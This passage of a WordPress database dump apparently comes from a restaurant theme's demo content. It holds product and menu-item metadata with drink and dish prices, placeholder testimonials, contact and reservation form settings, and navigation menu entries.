rid_id\";a:0:{}}'),(56155,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56156,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56157,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56158,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56159,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56160,3125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56161,3125,'mkdf_show_new_sign_woo_meta','no'),(56162,3125,'slide_template','default'),(56163,3125,'_wpb_vc_js_status','false'),(56164,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56165,3126,'_sku','PR0039'),(56166,3126,'_regular_price','200'),(56167,3126,'_sale_price',''),(56168,3126,'_sale_price_dates_from',''),(56169,3126,'_sale_price_dates_to',''),(56170,3126,'total_sales','0'),(56171,3126,'_tax_status','taxable'),(56172,3126,'_tax_class',''),(56173,3126,'_manage_stock','no'),(56174,3126,'_backorders','no'),(56175,3126,'_sold_individually','no'),(56176,3126,'_weight','185'),(56177,3126,'_length',''),(56178,3126,'_width',''),(56179,3126,'_height',''),(56180,3126,'_upsell_ids','a:0:{}'),(56181,3126,'_crosssell_ids','a:0:{}'),(56182,3126,'_purchase_note',''),(56183,3126,'_default_attributes','a:0:{}'),(56184,3126,'_virtual','no'),(56185,3126,'_downloadable','no'),(56186,3126,'_product_image_gallery',''),(56187,3126,'_download_limit','-1'),(56188,3126,'_download_expiry','-1'),(56189,3126,'_thumbnail_id','522'),(56190,3126,'_stock',''),(56191,3126,'_stock_status','instock'),(56192,3126,'_wc_average_rating','0'),(56193,3126,'_wc_rating_count','a:0:{}'),(56194,3126,'_wc_review_count','0'),(56195,3126,'_downloadable_files','a:0:{}'),(56196,3126,'_product_attributes','a:0:{}'),(56197,3126,'_product_version','3.4.3'),(56198,3126,'_price','200'),(56199,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56200,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56201,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56202,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56203,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56204,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56205,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56206,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56207,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56208,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56209,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56210,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56211,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56212,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56213,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56214,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56215,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56216,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56217,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56218,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56219,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56220,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56221,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56222,3126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56223,3126,'mkdf_show_new_sign_woo_meta','no'),(56224,3126,'slide_template','default'),(56225,3126,'_wpb_vc_js_status','false'),(56226,3127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56227,3127,'restaurant_menu_item_price','20'),(56228,3127,'restaurant_menu_item_description','Rye, genever, demerara, and green chartreuse'),(56229,3127,'slide_template','default'),(56230,3127,'restaurant_menu_item_label','1'),(56231,3128,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56232,3128,'restaurant_menu_item_price','30$'),(56233,3128,'restaurant_menu_item_description','Scotch, cranberry grenadine, lemon, and gilka kummel'),(56234,3128,'restaurant_menu_item_label','2'),(56235,3128,'slide_template','default'),(56236,3129,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56237,3129,'restaurant_menu_item_price','26$'),(56238,3129,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(56239,3129,'restaurant_menu_item_label','3'),(56240,3129,'slide_template','default'),(56241,3130,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56242,3130,'restaurant_menu_item_price','50$'),(56243,3130,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(56244,3130,'slide_template','default'),(56245,3131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56246,3131,'restaurant_menu_item_price','15$'),(56247,3131,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(56248,3131,'slide_template','default'),(56249,3132,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56250,3132,'restaurant_menu_item_price','10$'),(56251,3132,'restaurant_menu_item_description','Sweet vermouth, amaro lucano, and saline'),(56252,3132,'slide_template','default'),(56253,3133,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56254,3133,'restaurant_menu_item_price','30$'),(56255,3133,'restaurant_menu_item_description','Pineapple rum, sweet vermouth, amaro lucano, and saline'),(56256,3133,'slide_template','default'),(56257,3134,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56258,3134,'restaurant_menu_item_price','35$'),(56259,3134,'restaurant_menu_item_description','Gins, Elske tonic syrup, and lime'),(56260,3134,'slide_template','default'),(56261,3135,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56262,3135,'restaurant_menu_item_price','50$'),(56263,3135,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(56264,3135,'slide_template','default'),(56265,3136,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56266,3136,'restaurant_menu_item_price','20$'),(56267,3136,'restaurant_menu_item_description','France (Provence) Cinsault, Grenache France (Provence) Cinsault, Grenache'),(56268,3136,'slide_template','default'),(56269,3137,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56270,3137,'restaurant_menu_item_price','50$'),(56271,3137,'restaurant_menu_item_description','France (Loire) Sauvignon Blanc France (Loire) Sauvignon Blanc'),(56272,3137,'slide_template','default'),(56273,3138,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56274,3138,'restaurant_menu_item_price','70$'),(56275,3138,'restaurant_menu_item_description','Portugal (Douro) Rabigato, Codéga de LarinhoFrance (Provence) Cinsault'),(56276,3138,'slide_template','default'),(56277,3139,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56278,3139,'restaurant_menu_item_price','30$'),(56279,3139,'restaurant_menu_item_description','France (Burgundy) Chardonnay'),(56280,3139,'slide_template','default'),(56281,3140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56282,3140,'restaurant_menu_item_price','20$'),(56283,3140,'restaurant_menu_item_description','France (Champagne) Chardonnay, Pinot Noir'),(56284,3140,'slide_template','default'),(56285,3141,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56286,3141,'restaurant_menu_item_price','70$'),(56287,3141,'restaurant_menu_item_description','France (Provence) Cinsault'),(56288,3141,'slide_template','default'),(56289,3142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56290,3142,'restaurant_menu_item_price','20$'),(56291,3142,'restaurant_menu_item_description','France (Loire)'),(56292,3142,'slide_template','default'),(56293,3143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56294,3143,'restaurant_menu_item_price','80$'),(56295,3143,'restaurant_menu_item_description','Portugal (Douro) Rabigato'),(56296,3143,'slide_template','default'),(56297,3144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56298,3144,'restaurant_menu_item_price','50$'),(56299,3144,'restaurant_menu_item_description','Ground cumin, avocados, peeled and cubed'),(56300,3144,'slide_template','default'),(56301,3145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56302,3145,'restaurant_menu_item_price','30$'),(56303,3145,'restaurant_menu_item_description','Fresh goat cheese, garlic cloves, minced'),(56304,3145,'slide_template','default'),(56305,3146,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56306,3146,'restaurant_menu_item_price','70$'),(56307,3146,'restaurant_menu_item_description','Garbanzo beans or chickpeas, rinsed and drained'),(56308,3146,'slide_template','default'),(56309,3147,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56310,3147,'restaurant_menu_item_price','50$'),(56311,3147,'restaurant_menu_item_description','Marinated artichoke hearts'),(56312,3147,'slide_template','default'),(56313,3148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56314,3148,'restaurant_menu_item_price','30$'),(56315,3148,'restaurant_menu_item_description','Spreadable cream cheese, crumbled blue cheese'),(56316,3148,'slide_template','default'),(56317,3149,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56318,3149,'restaurant_menu_item_price','20$'),(56319,3149,'restaurant_menu_item_description','French bread baguette, cooked ham, potato salad'),(56320,3149,'slide_template','default'),(56321,3150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56322,3150,'restaurant_menu_item_price','10$'),(56323,3150,'restaurant_menu_item_description','Cream cheese, softened, butter, brown sugar'),(56324,3150,'slide_template','default'),(56325,3151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56326,3151,'restaurant_menu_item_price','30$'),(56327,3151,'restaurant_menu_item_description','Cherry-size fresh mozzarella cheese balls'),(56328,3151,'slide_template','default'),(56329,1346,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56330,1346,'restaurant_menu_item_price','50$'),(56331,1346,'restaurant_menu_item_description','Hummus, Greek olives, feta cheese'),(56332,1346,'slide_template','default'),(56333,3152,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56334,3152,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(56335,3152,'mkdf_testimonial_author','anthony johnston'),(56336,3152,'mkdf_testimonial_author_position','guest'),(56337,3152,'slide_template','default'),(56338,3153,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56339,3153,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(56340,3153,'mkdf_testimonial_author','Ruby Anderson'),(56341,3153,'mkdf_testimonial_author_position','guest'),(56342,3153,'slide_template','default'),(56343,603,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56344,603,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(56345,603,'mkdf_testimonial_author','Isabella Lee'),(56346,603,'mkdf_testimonial_author_position','guest'),(56347,603,'slide_template','default'),(56348,1348,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56349,1348,'restaurant_menu_item_price','8$'),(56350,1348,'restaurant_menu_item_description','Corona, Corona Light, Modelo Light & Modelo Especial'),(56351,1348,'slide_template','default'),(56352,1349,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56353,1349,'restaurant_menu_item_price','9$'),(56354,1349,'restaurant_menu_item_description','Budweiser or Bud Light. Florida only.'),(56355,1349,'slide_template','default'),(56356,1350,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56357,1350,'restaurant_menu_item_price','120$'),(56358,1350,'restaurant_menu_item_description','Argentina'),(56359,1350,'slide_template','default'),(56360,1351,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56361,1351,'restaurant_menu_item_price','150$'),(56362,1351,'restaurant_menu_item_description','WA'),(56363,1351,'slide_template','default'),(56364,1352,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56365,1352,'restaurant_menu_item_price','170$'),(56366,1352,'restaurant_menu_item_description','Stag\'s Leap Wine Cellars, Napa Valley'),(56367,1352,'slide_template','default'),(56368,1353,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56369,1353,'restaurant_menu_item_price','120$'),(56370,1353,'restaurant_menu_item_description','Cavit, Italy'),(56371,1353,'slide_template','default'),(56372,1354,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56373,1354,'restaurant_menu_item_price','70$'),(56374,1354,'restaurant_menu_item_description','Chateau Ste. Michelle, WA'),(56375,1354,'slide_template','default'),(56376,1355,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56377,1355,'restaurant_menu_item_price','20$'),(56378,1355,'restaurant_menu_item_description','Pusser\'s Rum & orange juice with a touch of pina colada mix.'),(56379,1355,'slide_template','default'),(56380,1356,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56381,1356,'restaurant_menu_item_price','12$'),(56382,1356,'restaurant_menu_item_description','Grey Goose Vodka, fresh squeezed lime juice'),(56383,1356,'slide_template','default'),(56384,1357,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56385,1357,'restaurant_menu_item_price','15$'),(56386,1357,'restaurant_menu_item_description','Fireball Cinnamon Whisky & RumChata.'),(56387,1357,'slide_template','default'),(56388,1358,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56389,1358,'restaurant_menu_item_price','9$'),(56390,1358,'restaurant_menu_item_description','Cruzan Single Barrel Rum, blackberry, banana and berry flavors.'),(56391,1358,'slide_template','default'),(56392,1360,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56393,1360,'restaurant_menu_item_price','7$'),(56394,1360,'restaurant_menu_item_description','The traditional cuban cocktail combination. Refreshing lime and mint leaves. Made with Cruzan Light Rum.'),(56395,1360,'slide_template','default'),(56396,1361,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56397,1361,'restaurant_menu_item_price','8$'),(56398,1361,'restaurant_menu_item_description','Smirnoff Vodka, Sauza Blue Tequila, Myer\'s Platinum, Gin, Blue Curocoo, Sour Mix and Sierra Mist'),(56399,1361,'slide_template','default'),(56400,1362,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56401,1362,'restaurant_menu_item_price','7$'),(56402,1362,'restaurant_menu_item_description','Made with Sauza Blue Tequila, watermelon and margarita mix. Topped with fresh watermelon and limes.'),(56403,1362,'slide_template','default'),(56404,1363,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56405,1363,'restaurant_menu_item_price','5$'),(56406,1363,'restaurant_menu_item_description','Cruzan Rum, Fresh Mint and Sierra Mist.'),(56407,1363,'slide_template','default'),(56408,2904,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56409,2904,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(56410,2904,'mkdf_testimonial_author','anthony johnston'),(56411,2904,'mkdf_testimonial_author_position','guest'),(56412,2904,'slide_template','default'),(56413,2906,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56414,2906,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(56415,2906,'mkdf_testimonial_author','anthony johnston'),(56416,2906,'mkdf_testimonial_author_position','guest'),(56417,2906,'slide_template','default'),(56418,3154,'_form','<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit \"Send\"]'),(56419,3154,'_mail','a:8:{s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(56420,3154,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";i:0;s:13:\"exclude_blank\";i:0;}'),(56421,3154,'_messages','a:8:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";}'),(56422,3154,'_additional_settings',''),(56423,3154,'_locale','en_US'),(56424,3155,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56425,3155,'_form','<div class=\"mkdf-cf7-rf\">\n<label> Event name:[text* event-name]</label><div class=\"mkdf-cf7-rf-date\">\n<label> Event date:[date* your-date min:2018-08-01 max:2050-12-31 class:required \"2018-08-01\"]</label><label> Start time:[time* time-938 time-format:HH:mm min-hour:00-00 max-hour:24*00 step-hour:1]</label><label> End time:[time* time-624 time-format:HH:mm] </label>\n</div>\n[checkbox checkbox-201 \"I/We have flexible date\"]\n<div class=\"mkdf-cf7-rf-guests\">\n<label> Guests:[text* guests] </label><label> Budget:[text* budget]</label><p>[radio radio-653 class:guests label_first default:1 \"Total\" \"Per person\" ]</p>\n</div>\n<label> Contact name:[text* contact-name] </label>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Company (optional):[text company-name] </label><label>Industry (optional):[text industry-name]</label>\n</div>\n<div class=\"mkdf-cf7-rf-2-col\">\n<label> Email:[email* your-email] </label><label>Phone:[text* phone-number]</label>\n</div>\n<div class=\"mkdf-cf7-rf-msg\">\n<label> Tell us more about event (optional):\n[textarea your-message] </label>\n</div>\n<div class=\"mkdf-cf7-rf-btn\">\n<div class=\"mkdf-cf7-rf-btn-inner\">\n[submit \"Send Reservation\"]\n</div>\n</div>\n</div>'),(56426,3155,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:48:\"[your-name] <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:25:\"support@mikado-themes.com\";s:4:\"body\";s:176:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(56427,3155,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:23:\"Attika \"[your-subject]\"\";s:6:\"sender\";s:43:\"Attika <wordpress@attika.mikado-themes.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:118:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on Attika (http://attika.mikado-themes.com)\";s:18:\"additional_headers\";s:35:\"Reply-To: support@mikado-themes.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(56428,3155,'_messages','a:23:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:22:\"The field is required.\";s:16:\"invalid_too_long\";s:22:\"The field is too long.\";s:17:\"invalid_too_short\";s:23:\"The field is too short.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:20:\"The file is too big.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:14:\"invalid_number\";s:29:\"The number format is invalid.\";s:16:\"number_too_small\";s:47:\"The number is smaller than the minimum allowed.\";s:16:\"number_too_large\";s:46:\"The number is larger than the maximum allowed.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:13:\"invalid_email\";s:38:\"The e-mail address entered is invalid.\";s:11:\"invalid_url\";s:19:\"The URL is invalid.\";s:11:\"invalid_tel\";s:32:\"The telephone number is invalid.\";s:16:\"invalid_datetime\";s:31:\"Invalid date and time supplied.\";s:12:\"invalid_date\";s:29:\"The date format is incorrect.\";s:12:\"invalid_time\";s:22:\"Invalid time supplied.\";}'),(56429,3155,'_additional_settings',''),(56430,3155,'_locale','en_US'),(56431,2905,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56432,2905,'mkdf_testimonial_text','\" Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus diam est, pellentesque eu fermentum a, lobortis tincidunt tellus. Vivamus in dolor tincidunt sapien placerat consectetur. Curabitur ligula lacus, venenatis non dolor vel, semper egestas purus. In condimentum lacinia sem, sit amet dignissim ligula fermentum in. In euismod justo felis, in gravida nibh rutrum id. Maecenas in metus ac neque. \"'),(56433,2905,'mkdf_testimonial_author','Isabella Lee'),(56434,2905,'mkdf_testimonial_author_position','guest'),(56435,2905,'slide_template','default'),(56436,4394,'_menu_item_type','post_type'),(56437,4394,'_menu_item_menu_item_parent','4348'),(56438,4394,'_menu_item_object_id','3040'),(56439,4394,'_menu_item_object','page'),(56440,4394,'_menu_item_target',''),(56441,4394,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56442,4394,'_menu_item_xfn',''),(56443,4394,'_menu_item_url',''),(56444,4394,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56445,4394,'_menu_item_icon','null'),(56446,4395,'_menu_item_type','post_type'),(56447,4395,'_menu_item_menu_item_parent','4351'),(56448,4395,'_menu_item_object_id','3034'),(56449,4395,'_menu_item_object','page'),(56450,4395,'_menu_item_target',''),(56451,4395,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56452,4395,'_menu_item_xfn',''),(56453,4395,'_menu_item_url',''),(56454,4395,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56455,4395,'_menu_item_icon','null'),(56456,4396,'_menu_item_type','post_type'),(56457,4396,'_menu_item_menu_item_parent','4371'),(56458,4396,'_menu_item_object_id','3035'),(56459,4396,'_menu_item_object','page'),(56460,4396,'_menu_item_target',''),(56461,4396,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56462,4396,'_menu_item_xfn',''),(56463,4396,'_menu_item_url',''),(56464,4396,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56465,4396,'_menu_item_icon','null'),(56466,4397,'_menu_item_type','post_type'),(56467,4397,'_menu_item_menu_item_parent','4371'),(56468,4397,'_menu_item_object_id','3037'),(56469,4397,'_menu_item_object','page'),(56470,4397,'_menu_item_target',''),(56471,4397,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56472,4397,'_menu_item_xfn',''),(56473,4397,'_menu_item_url',''),(56474,4397,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56475,4397,'_menu_item_icon','null'),(56476,4398,'_menu_item_type','post_type'),(56477,4398,'_menu_item_menu_item_parent','4371'),(56478,4398,'_menu_item_object_id','3036'),(56479,4398,'_menu_item_object','page'),(56480,4398,'_menu_item_target',''),(56481,4398,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56482,4398,'_menu_item_xfn',''),(56483,4398,'_menu_item_url',''),(56484,4398,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56485,4398,'_menu_item_icon','null'),(56486,4399,'_menu_item_type','post_type'),(56487,4399,'_menu_item_menu_item_parent','4380'),(56488,4399,'_menu_item_object_id','3038'),(56489,4399,'_menu_item_object','page'),(56490,4399,'_menu_item_target',''),(56491,4399,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56492,4399,'_menu_item_xfn',''),(56493,4399,'_menu_item_url',''),(56494,4399,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56495,4399,'_menu_item_icon','null'),(56496,4400,'_menu_item_type','post_type'),(56497,4400,'_menu_item_menu_item_parent','4384'),(56498,4400,'_menu_item_object_id','3038'),(56499,4400,'_menu_item_object','page'),(56500,4400,'_menu_item_target',''),(56501,4400,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56502,4400,'_menu_item_xfn',''),(56503,4400,'_menu_item_url',''),(56504,4400,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56505,4400,'_menu_item_icon','null'),(56506,4401,'_menu_item_type','post_type'),(56507,4401,'_menu_item_menu_item_parent','4357'),(56508,4401,'_menu_item_object_id','3034'),(56509,4401,'_menu_item_object','page'),(56510,4401,'_menu_item_target',''),(56511,4401,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56512,4401,'_menu_item_xfn',''),(56513,4401,'_menu_item_url',''),(56514,4401,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56515,4401,'_menu_item_icon','null'),(56516,4402,'_menu_item_type','post_type'),(56517,4402,'_menu_item_menu_item_parent','4374'),(56518,4402,'_menu_item_object_id','3037'),(56519,4402,'_menu_item_object','page'),(56520,4402,'_menu_item_target',''),(56521,4402,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(56522,4402,'_menu_item_xfn',''),(56523,4402,'_menu_item_url',''),(56524,4402,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(56525,4402,'_menu_item_icon','null'),(56526,4403,'_menu_item_type','post_type'),(56527,4403,'_menu_item_menu_item_parent','4374'),(56528,4403,'_menu_item_object_id','3036'),(56529,4403,'_menu_item_object','page'),(56530,4403,'_menu_item_target',''